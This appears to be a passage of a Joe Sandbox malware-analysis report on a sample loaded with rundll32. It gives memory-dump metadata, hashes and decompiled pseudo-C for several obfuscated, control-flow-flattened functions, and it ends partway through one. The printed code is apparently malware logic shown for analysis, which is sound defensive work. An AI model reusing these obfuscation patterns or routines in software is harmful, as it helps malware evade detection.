                                                                                                                      0x00698ec8
                                                                                                                      0x00698ec9
                                                                                                                      0x00698eca
                                                                                                                      0x00698ecc
                                                                                                                      0x00698ed1
                                                                                                                      0x00698ed4
                                                                                                                      0x00698ed7
                                                                                                                      0x00698ede
                                                                                                                      0x00698edf
                                                                                                                      0x00698ee2
                                                                                                                      0x00698ee5
                                                                                                                      0x00698ee5
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ulG$wV
                                                                                                                      • API String ID: 0-391097709
                                                                                                                      • Opcode ID: a95bd8f9c3a102d8b1ee39e75c0e83002d9fc015c131da99ae1b35e89d7d4da6
                                                                                                                      • Instruction ID: 953cd2d0d78d1ffa71f1c9deb6cb9909c271f5b0834bf48d0c21f197fcf8425a
                                                                                                                      • Opcode Fuzzy Hash: a95bd8f9c3a102d8b1ee39e75c0e83002d9fc015c131da99ae1b35e89d7d4da6
                                                                                                                      • Instruction Fuzzy Hash: F6915471D01219EBDF54DFA5D88A9DEBBB2FF44314F208109E216BB250D7B01A46CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00686D24 Relevance: 2.7, Strings: 2, Instructions: 164COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00686D24() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				short* _t158;
				void* _t161;
				void* _t164;
				intOrPtr _t173;
				intOrPtr _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t198;

				_v556 = 0x5b9523;
				_v556 = _v556 ^ 0xd644881d;
				_t164 = 0xafec1cc;
				_v556 = _v556 ^ 0xd61fc18a;
				_v560 = 0xf0211a;
				_v560 = _v560 >> 0xc;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x000d86e8;
				_v536 = 0x5b86ee;
				_t192 = 0x7a;
				_v536 = _v536 / _t192;
				_v536 = _v536 ^ 0x00051f37;
				_v528 = 0x15dba1;
				_v528 = _v528 + 0xffff3226;
				_v528 = _v528 ^ 0x001c60e6;
				_v564 = 0xcdfacc;
				_v564 = _v564 ^ 0x78a7d3e3;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x8a48a6fd;
				_v572 = 0x7eccf1;
				_v572 = _v572 + 0xffffd1bc;
				_t193 = 0x2e;
				_v572 = _v572 * 0x26;
				_v572 = _v572 ^ 0x12c53124;
				_v588 = 0x8dc921;
				_v588 = _v588 | 0x53df5653;
				_v588 = _v588 << 7;
				_v588 = _v588 * 0x73;
				_v588 = _v588 ^ 0xc8beb34e;
				_v544 = 0xe1fa74;
				_v544 = _v544 + 0xffffe6ac;
				_v544 = _v544 ^ 0x00e0f2b8;
				_v568 = 0x925246;
				_v568 = _v568 + 0xffffcd65;
				_v568 = _v568 + 0xffffdee0;
				_v568 = _v568 ^ 0x009eae97;
				_v576 = 0x3c09b4;
				_v576 = _v576 + 0xffff2c4c;
				_v576 = _v576 >> 0xa;
				_v576 = _v576 ^ 0x000cc2c3;
				_v592 = 0xac7846;
				_v592 = _v592 ^ 0xbb2572b9;
				_v592 = _v592 ^ 0xeb3265e6;
				_v592 = _v592 | 0x6a541c4b;
				_v592 = _v592 ^ 0x7af30806;
				_v548 = 0xb1a24a;
				_v548 = _v548 / _t193;
				_v548 = _v548 ^ 0x00094ccb;
				_v552 = 0xbe5b93;
				_v552 = _v552 | 0xe01e3375;
				_v552 = _v552 ^ 0xe0b0d42a;
				_v532 = 0x76dce5;
				_t194 = 0x19;
				_v532 = _v532 / _t194;
				_v532 = _v532 ^ 0x00002403;
				_v584 = 0xffb3b0;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x8b2427a7;
				_v584 = _v584 | 0x0ff5fda2;
				_v584 = _v584 ^ 0x7ffdbf2b;
				_v580 = 0x6f9ecd;
				_t195 = 0x5b;
				_v580 = _v580 / _t195;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x13a22276;
				_v540 = 0xd8d341;
				_v540 = _v540 * 0xb;
				_v540 = _v540 ^ 0x095c7847;
				do {
					while(_t164 != 0x2dc4ff7) {
						if(_t164 == 0x5cfc1e4) {
							return E00689DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00684EE3, _v540, 0);
						}
						if(_t164 == 0x9efe9dd) {
							_push(_v536);
							_push(_v560);
							_t161 = E0069DCF7(_v556, 0x681000, __eflags);
							_t173 =  *0x6a3e10; // 0x0
							_t188 =  *0x6a3e10; // 0x0
							E006847CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
							_t158 = E0068A8B0(_v568, _t161, _v576);
							_t198 = _t198 + 0x24;
							_t164 = 0x2dc4ff7;
							continue;
						}
						if(_t164 != 0xafec1cc) {
							goto L8;
						}
						_t164 = 0x9efe9dd;
					}
					_t158 = E0068B6CF( &_v524, _v592, _v548, _v552);
					__eflags = 0;
					 *_t158 = 0;
					_t164 = 0x5cfc1e4;
					L8:
					__eflags = _t164 - 0xdc02af8;
				} while (__eflags != 0);
				return _t158;
			}































                                                                                                                      0x00686d2a
                                                                                                                      0x00686d34
                                                                                                                      0x00686d3c
                                                                                                                      0x00686d41
                                                                                                                      0x00686d49
                                                                                                                      0x00686d51
                                                                                                                      0x00686d56
                                                                                                                      0x00686d5b
                                                                                                                      0x00686d63
                                                                                                                      0x00686d75
                                                                                                                      0x00686d7a
                                                                                                                      0x00686d80
                                                                                                                      0x00686d88
                                                                                                                      0x00686d90
                                                                                                                      0x00686d98
                                                                                                                      0x00686da0
                                                                                                                      0x00686da8
                                                                                                                      0x00686db0
                                                                                                                      0x00686db5
                                                                                                                      0x00686dbd
                                                                                                                      0x00686dc5
                                                                                                                      0x00686dd2
                                                                                                                      0x00686dd5
                                                                                                                      0x00686dd9
                                                                                                                      0x00686de1
                                                                                                                      0x00686de9
                                                                                                                      0x00686df1
                                                                                                                      0x00686dfb
                                                                                                                      0x00686dff
                                                                                                                      0x00686e07
                                                                                                                      0x00686e0f
                                                                                                                      0x00686e17
                                                                                                                      0x00686e1f
                                                                                                                      0x00686e27
                                                                                                                      0x00686e2f
                                                                                                                      0x00686e37
                                                                                                                      0x00686e3f
                                                                                                                      0x00686e47
                                                                                                                      0x00686e4f
                                                                                                                      0x00686e54
                                                                                                                      0x00686e5c
                                                                                                                      0x00686e64
                                                                                                                      0x00686e6c
                                                                                                                      0x00686e74
                                                                                                                      0x00686e7c
                                                                                                                      0x00686e84
                                                                                                                      0x00686e94
                                                                                                                      0x00686e98
                                                                                                                      0x00686ea0
                                                                                                                      0x00686ea8
                                                                                                                      0x00686eb0
                                                                                                                      0x00686eb8
                                                                                                                      0x00686ec4
                                                                                                                      0x00686ec7
                                                                                                                      0x00686ecb
                                                                                                                      0x00686ed3
                                                                                                                      0x00686edb
                                                                                                                      0x00686ee0
                                                                                                                      0x00686ee8
                                                                                                                      0x00686ef0
                                                                                                                      0x00686efa
                                                                                                                      0x00686f08
                                                                                                                      0x00686f15
                                                                                                                      0x00686f1e
                                                                                                                      0x00686f23
                                                                                                                      0x00686f2b
                                                                                                                      0x00686f38
                                                                                                                      0x00686f3c
                                                                                                                      0x00686f44
                                                                                                                      0x00686f44
                                                                                                                      0x00686f4e
                                                                                                                      0x00000000
                                                                                                                      0x0068701e
                                                                                                                      0x00686f56
                                                                                                                      0x00686f68
                                                                                                                      0x00686f71
                                                                                                                      0x00686f79
                                                                                                                      0x00686f8a
                                                                                                                      0x00686fa2
                                                                                                                      0x00686fb2
                                                                                                                      0x00686fc1
                                                                                                                      0x00686fc6
                                                                                                                      0x00686fc9
                                                                                                                      0x00000000
                                                                                                                      0x00686fc9
                                                                                                                      0x00686f5e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00686f64
                                                                                                                      0x00686f64
                                                                                                                      0x00686fe0
                                                                                                                      0x00686fe7
                                                                                                                      0x00686fe9
                                                                                                                      0x00686fec
                                                                                                                      0x00686fee
                                                                                                                      0x00686fee
                                                                                                                      0x00686fee
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Gx\$e2
                                                                                                                      • API String ID: 0-3912940318
                                                                                                                      • Opcode ID: 55d4e61b502759138caeb8476358718871d08e997929997031bc35652e89b19e
                                                                                                                      • Instruction ID: ca6ef48e5964392eab3277f3963f3dbdf572d04937d621519646e3a75204b0fc
                                                                                                                      • Opcode Fuzzy Hash: 55d4e61b502759138caeb8476358718871d08e997929997031bc35652e89b19e
                                                                                                                      • Instruction Fuzzy Hash: 597132711083419FC768DF25D88A81FBBF2FBC4758F205A1DF29696260D3B1994ACF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068A55F Relevance: 2.7, Strings: 2, Instructions: 159COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0068A55F() {
				char _v520;
				signed int _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _t161;
				char* _t162;
				intOrPtr _t164;
				void* _t168;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				short* _t195;
				signed int* _t197;

				_t197 =  &_v584;
				_v528 = _v528 & 0x00000000;
				_v524 = _v524 & 0x00000000;
				_t168 = 0xe71c2f1;
				_v532 = 0xa0346f;
				_v560 = 0x45ed96;
				_t187 = 0x29;
				_v560 = _v560 / _t187;
				_t189 = 0x5d;
				_v560 = _v560 * 0x5e;
				_v560 = _v560 ^ 0x00ac5e2c;
				_v568 = 0x587b3f;
				_v568 = _v568 >> 1;
				_v568 = _v568 >> 6;
				_v568 = _v568 + 0x3200;
				_v568 = _v568 ^ 0x000d20ef;
				_v540 = 0x1767bf;
				_v540 = _v540 >> 0xa;
				_v540 = _v540 ^ 0x00010300;
				_v548 = 0xad8e3d;
				_v548 = _v548 ^ 0x5762e507;
				_v548 = _v548 ^ 0xbd28358e;
				_v548 = _v548 ^ 0xeae8e106;
				_v584 = 0xa1a61c;
				_v584 = _v584 * 0x38;
				_v584 = _v584 + 0xffff1963;
				_v584 = _v584 | 0xaacebf86;
				_v584 = _v584 ^ 0xabd4b38c;
				_v556 = 0xa4c35b;
				_v556 = _v556 / _t189;
				_v556 = _v556 | 0xf6aeb391;
				_v556 = _v556 ^ 0xf6ac7ee7;
				_v536 = 0xf31b8a;
				_v536 = _v536 | 0x87603e20;
				_v536 = _v536 ^ 0x87f7aca9;
				_v576 = 0x423791;
				_v576 = _v576 + 0xffffb580;
				_v576 = _v576 + 0x7a73;
				_v576 = _v576 ^ 0x7a6e2c80;
				_v576 = _v576 ^ 0x7a24ad4c;
				_v544 = 0x7ccdad;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x3e66d3ae;
				_v572 = 0x1eeccc;
				_v572 = _v572 | 0x2c9b1d75;
				_v572 = _v572 << 6;
				_t190 = 0x5b;
				_v572 = _v572 / _t190;
				_v572 = _v572 ^ 0x007e2283;
				_v552 = 0x119b6d;
				_t191 = 0x5a;
				_v552 = _v552 / _t191;
				_v552 = _v552 ^ 0xceecc8a8;
				_v552 = _v552 ^ 0xceebe4d8;
				_v580 = 0x5ef79f;
				_v580 = _v580 / _t187;
				_v580 = _v580 | 0x8cf80c97;
				_t192 = 0x3d;
				_v580 = _v580 / _t192;
				_v580 = _v580 ^ 0x02499ffb;
				do {
					while(_t168 != 0xc65bb2) {
						if(_t168 == 0x63f282e) {
							_t162 = E0069DA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
							_t197 =  &(_t197[4]);
							_t168 = 0xc65bb2;
							continue;
						}
						if(_t168 == 0xb3c9692) {
							_t164 =  *0x6a3e10; // 0x0
							__eflags = _t164 + 0x1c;
							return E00683BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
						}
						if(_t168 != 0xe71c2f1) {
							goto L15;
						}
						_t168 = 0x63f282e;
					}
					_v564 = 0x8b8c25;
					_v564 = _v564 * 0x78;
					_v564 = _v564 + 0xffff9cfb;
					_v564 = _v564 ^ 0x41694e51;
					_t161 = E0068CB52(_v584,  &_v520, _v556, _v536, _v576);
					_t197 =  &(_t197[3]);
					_t195 =  &_v520 + _t161 * 2;
					while(1) {
						_t162 =  &_v520;
						__eflags = _t195 - _t162;
						if(_t195 <= _t162) {
							break;
						}
						__eflags =  *_t195 - 0x5c;
						if( *_t195 != 0x5c) {
							L10:
							_t195 = _t195 - 2;
							__eflags = _t195;
							continue;
						}
						_t139 =  &_v564;
						 *_t139 = _v564 - 1;
						__eflags =  *_t139;
						if( *_t139 == 0) {
							__eflags = _t195;
							L14:
							_t168 = 0xb3c9692;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t168 - 0x6143c47;
				} while (__eflags != 0);
				return _t162;
			}































                                                                                                                      0x0068a55f
                                                                                                                      0x0068a565
                                                                                                                      0x0068a56c
                                                                                                                      0x0068a571
                                                                                                                      0x0068a576
                                                                                                                      0x0068a57e
                                                                                                                      0x0068a590
                                                                                                                      0x0068a595
                                                                                                                      0x0068a5a0
                                                                                                                      0x0068a5a3
                                                                                                                      0x0068a5a7
                                                                                                                      0x0068a5af
                                                                                                                      0x0068a5b7
                                                                                                                      0x0068a5bb
                                                                                                                      0x0068a5c0
                                                                                                                      0x0068a5c8
                                                                                                                      0x0068a5d0
                                                                                                                      0x0068a5d8
                                                                                                                      0x0068a5dd
                                                                                                                      0x0068a5e5
                                                                                                                      0x0068a5ed
                                                                                                                      0x0068a5f5
                                                                                                                      0x0068a5fd
                                                                                                                      0x0068a605
                                                                                                                      0x0068a612
                                                                                                                      0x0068a616
                                                                                                                      0x0068a61e
                                                                                                                      0x0068a626
                                                                                                                      0x0068a62e
                                                                                                                      0x0068a63e
                                                                                                                      0x0068a642
                                                                                                                      0x0068a64a
                                                                                                                      0x0068a652
                                                                                                                      0x0068a65a
                                                                                                                      0x0068a662
                                                                                                                      0x0068a66a
                                                                                                                      0x0068a672
                                                                                                                      0x0068a67a
                                                                                                                      0x0068a682
                                                                                                                      0x0068a68a
                                                                                                                      0x0068a692
                                                                                                                      0x0068a69a
                                                                                                                      0x0068a69f
                                                                                                                      0x0068a6a7
                                                                                                                      0x0068a6af
                                                                                                                      0x0068a6b7
                                                                                                                      0x0068a6c0
                                                                                                                      0x0068a6c5
                                                                                                                      0x0068a6c9
                                                                                                                      0x0068a6d1
                                                                                                                      0x0068a6df
                                                                                                                      0x0068a6e4
                                                                                                                      0x0068a6e8
                                                                                                                      0x0068a6f0
                                                                                                                      0x0068a6f8
                                                                                                                      0x0068a706
                                                                                                                      0x0068a70a
                                                                                                                      0x0068a71a
                                                                                                                      0x0068a726
                                                                                                                      0x0068a72f
                                                                                                                      0x0068a73c
                                                                                                                      0x0068a73c
                                                                                                                      0x0068a742
                                                                                                                      0x0068a772
                                                                                                                      0x0068a777
                                                                                                                      0x0068a77a
                                                                                                                      0x00000000
                                                                                                                      0x0068a77a
                                                                                                                      0x0068a746
                                                                                                                      0x0068a7f0
                                                                                                                      0x0068a7f5
                                                                                                                      0x00000000
                                                                                                                      0x0068a80f
                                                                                                                      0x0068a752
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068a758
                                                                                                                      0x0068a758
                                                                                                                      0x0068a77e
                                                                                                                      0x0068a78f
                                                                                                                      0x0068a793
                                                                                                                      0x0068a79b
                                                                                                                      0x0068a7b3
                                                                                                                      0x0068a7bc
                                                                                                                      0x0068a7bf
                                                                                                                      0x0068a7d3
                                                                                                                      0x0068a7d3
                                                                                                                      0x0068a7d7
                                                                                                                      0x0068a7d9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068a7c4
                                                                                                                      0x0068a7c8
                                                                                                                      0x0068a7d0
                                                                                                                      0x0068a7d0
                                                                                                                      0x0068a7d0
                                                                                                                      0x00000000
                                                                                                                      0x0068a7d0
                                                                                                                      0x0068a7ca
                                                                                                                      0x0068a7ca
                                                                                                                      0x0068a7ca
                                                                                                                      0x0068a7ce
                                                                                                                      0x0068a7dd
                                                                                                                      0x0068a7e0
                                                                                                                      0x0068a7e0
                                                                                                                      0x00000000
                                                                                                                      0x0068a7e0
                                                                                                                      0x00000000
                                                                                                                      0x0068a7ce
                                                                                                                      0x00000000
                                                                                                                      0x0068a7e2
                                                                                                                      0x0068a7e2
                                                                                                                      0x0068a7e2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: QNiA$sz
                                                                                                                      • API String ID: 0-294658094
                                                                                                                      • Opcode ID: fb79a07f6a2ed0f7c649b011d5dcec1c066535297e9d8524351ddc23cf10ad2d
                                                                                                                      • Instruction ID: 3588af995ae3d048785028870eb94bf27132440a4d573647b77e717856d68ac4
                                                                                                                      • Opcode Fuzzy Hash: fb79a07f6a2ed0f7c649b011d5dcec1c066535297e9d8524351ddc23cf10ad2d
                                                                                                                      • Instruction Fuzzy Hash: 547164715093419BD398DF66D98581FBBF2FBC4718F404A1EF586A6260D3748A0A8F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00690B19 Relevance: 2.6, Strings: 2, Instructions: 144COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00690B19(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				void* _t160;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				intOrPtr _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int* _t194;

				_t194 =  &_v68;
				_v12 = 0xec215;
				_v8 = 0x867af3;
				_t190 =  *0x6a3208; // 0x0
				_v4 = 0;
				_t164 = __ecx;
				_v64 = 0x2d9572;
				_t191 = _t190 + 0x20c;
				_v64 = _v64 + 0xffff7051;
				_v64 = _v64 ^ 0xb4c09ebb;
				_v64 = _v64 | 0x08f8e0e6;
				_v64 = _v64 ^ 0xbcfdfbfe;
				_v40 = 0xaf9231;
				_v40 = _v40 + 0x3789;
				_v40 = _v40 + 0x1acf;
				_v40 = _v40 ^ 0x00adbfc0;
				_v68 = 0xf5f340;
				_v68 = _v68 ^ 0x3b0075db;
				_v68 = _v68 >> 1;
				_v68 = _v68 + 0xaae2;
				_v68 = _v68 ^ 0x1dff90e5;
				_v24 = 0xe1803e;
				_v24 = _v24 + 0x946c;
				_v24 = _v24 ^ 0x00ebebe2;
				_v44 = 0xcb8087;
				_t166 = 0x7f;
				_v44 = _v44 / _t166;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x00394faa;
				_v32 = 0x6e7c9c;
				_v32 = _v32 << 0xf;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x00f599ec;
				_v36 = 0x8d7ece;
				_v36 = _v36 + 0xd96f;
				_v36 = _v36 + 0x3e8b;
				_v36 = _v36 ^ 0x008d6b01;
				_v60 = 0x740a18;
				_v60 = _v60 + 0x5af6;
				_t167 = 0x2d;
				_v60 = _v60 / _t167;
				_t168 = 0xc;
				_v60 = _v60 / _t168;
				_v60 = _v60 ^ 0x000f4a79;
				_v48 = 0xecd979;
				_v48 = _v48 + 0xffff2496;
				_t169 = 3;
				_v48 = _v48 / _t169;
				_v48 = _v48 ^ 0xbc9c03a4;
				_v48 = _v48 ^ 0xbcdb2390;
				_v52 = 0x17ff93;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0x3109;
				_v52 = _v52 ^ 0x7590f195;
				_v52 = _v52 ^ 0x8a641707;
				_v20 = 0x28811b;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x05ddec85;
				_v56 = 0x23ad29;
				_t170 = 0x5a;
				_v56 = _v56 / _t170;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x06fabbcf;
				_v56 = _v56 ^ 0x06fdb2ad;
				_v28 = 0x8d9789;
				_v28 = _v28 | 0x3813f7c3;
				_v28 = _v28 + 0xa24c;
				_v28 = _v28 ^ 0x38ab2d0e;
				_v16 = 0x83a12;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x41de3db0;
				while(1) {
					_t192 =  *_t191;
					if(_t192 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
						L4:
						 *_t191 =  *_t192;
						_t160 = E00698519(_v28, _v16, _t192);
					} else {
						_t133 =  &_v40; // 0xebebe2
						_t160 = E00688DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
						_t194 =  &(_t194[4]);
						if(_t160 != _v64) {
							_t191 = _t192;
						} else {
							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
							E00699E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
							E00691E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
							_t194 =  &(_t194[5]);
							goto L4;
						}
					}
				}
				return _t160;
			}
































                                                                                                                      0x00690b19
                                                                                                                      0x00690b1c
                                                                                                                      0x00690b26
                                                                                                                      0x00690b32
                                                                                                                      0x00690b3a
                                                                                                                      0x00690b3e
                                                                                                                      0x00690b40
                                                                                                                      0x00690b48
                                                                                                                      0x00690b4e
                                                                                                                      0x00690b56
                                                                                                                      0x00690b5e
                                                                                                                      0x00690b66
                                                                                                                      0x00690b6e
                                                                                                                      0x00690b76
                                                                                                                      0x00690b7e
                                                                                                                      0x00690b86
                                                                                                                      0x00690b8e
                                                                                                                      0x00690b96
                                                                                                                      0x00690b9e
                                                                                                                      0x00690ba2
                                                                                                                      0x00690baa
                                                                                                                      0x00690bb2
                                                                                                                      0x00690bba
                                                                                                                      0x00690bc2
                                                                                                                      0x00690bca
                                                                                                                      0x00690bd8
                                                                                                                      0x00690bdd
                                                                                                                      0x00690be3
                                                                                                                      0x00690be8
                                                                                                                      0x00690bf0
                                                                                                                      0x00690bf8
                                                                                                                      0x00690bfd
                                                                                                                      0x00690c02
                                                                                                                      0x00690c0a
                                                                                                                      0x00690c12
                                                                                                                      0x00690c1a
                                                                                                                      0x00690c22
                                                                                                                      0x00690c2a
                                                                                                                      0x00690c32
                                                                                                                      0x00690c3e
                                                                                                                      0x00690c43
                                                                                                                      0x00690c4d
                                                                                                                      0x00690c52
                                                                                                                      0x00690c58
                                                                                                                      0x00690c60
                                                                                                                      0x00690c68
                                                                                                                      0x00690c74
                                                                                                                      0x00690c77
                                                                                                                      0x00690c7b
                                                                                                                      0x00690c83
                                                                                                                      0x00690c8b
                                                                                                                      0x00690c93
                                                                                                                      0x00690c98
                                                                                                                      0x00690ca0
                                                                                                                      0x00690ca8
                                                                                                                      0x00690cb0
                                                                                                                      0x00690cbd
                                                                                                                      0x00690cc1
                                                                                                                      0x00690cc9
                                                                                                                      0x00690cd9
                                                                                                                      0x00690cdc
                                                                                                                      0x00690ce0
                                                                                                                      0x00690ce5
                                                                                                                      0x00690ced
                                                                                                                      0x00690cf5
                                                                                                                      0x00690cfd
                                                                                                                      0x00690d05
                                                                                                                      0x00690d0d
                                                                                                                      0x00690d15
                                                                                                                      0x00690d1d
                                                                                                                      0x00690d22
                                                                                                                      0x00690d9d
                                                                                                                      0x00690d9d
                                                                                                                      0x00690da1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00690d2f
                                                                                                                      0x00690d8a
                                                                                                                      0x00690d95
                                                                                                                      0x00690d97
                                                                                                                      0x00690d31
                                                                                                                      0x00690d41
                                                                                                                      0x00690d45
                                                                                                                      0x00690d4a
                                                                                                                      0x00690d51
                                                                                                                      0x00690dab
                                                                                                                      0x00690d53
                                                                                                                      0x00690d58
                                                                                                                      0x00690d6a
                                                                                                                      0x00690d82
                                                                                                                      0x00690d87
                                                                                                                      0x00000000
                                                                                                                      0x00690d87
                                                                                                                      0x00690d51
                                                                                                                      0x00690d2f
                                                                                                                      0x00690daa

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1$
                                                                                                                      • API String ID: 0-209397207
                                                                                                                      • Opcode ID: 3b184e5783c89970d49c7a8312e027a105486dc4a9e9758e1d4787fefea569e7
                                                                                                                      • Instruction ID: 9579ccb1e7cb8ba0ddc191f2ec0fcd6fc1294dd128590f9c31e8aa1aa77c54d3
                                                                                                                      • Opcode Fuzzy Hash: 3b184e5783c89970d49c7a8312e027a105486dc4a9e9758e1d4787fefea569e7
                                                                                                                      • Instruction Fuzzy Hash: 9C614FB25083419FD394CF21D48940BBBF2FFC9768F509A1DF19692260C7B1DA4A8F46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068AEFB Relevance: 2.6, Strings: 2, Instructions: 141COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E0068AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t116;
				void* _t130;
				intOrPtr _t133;
				void* _t137;
				intOrPtr* _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;

				_t135 = _a12;
				_push(_a16);
				_t154 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t116);
				_v44 = 0xe8605f;
				_t162 = _t161 + 0x18;
				_v44 = _v44 + 0x84a0;
				_v44 = _v44 ^ 0x00e8e4ff;
				_t155 = 0;
				_v68 = 0xe00e28;
				_t137 = 0xc99b7e9;
				_v68 = _v68 << 9;
				_v68 = _v68 << 2;
				_t156 = 0x3b;
				_v68 = _v68 / _t156;
				_v68 = _v68 ^ 0x0001eb63;
				_v76 = 0x5a4023;
				_v76 = _v76 >> 0xf;
				_t157 = 0x5b;
				_v76 = _v76 * 0x13;
				_v76 = _v76 ^ 0x64c481b8;
				_v76 = _v76 ^ 0x64ccd277;
				_v64 = 0xe36df4;
				_v64 = _v64 / _t157;
				_t158 = 9;
				_v64 = _v64 * 0x52;
				_v64 = _v64 ^ 0x00c8b522;
				_v80 = 0x952e3b;
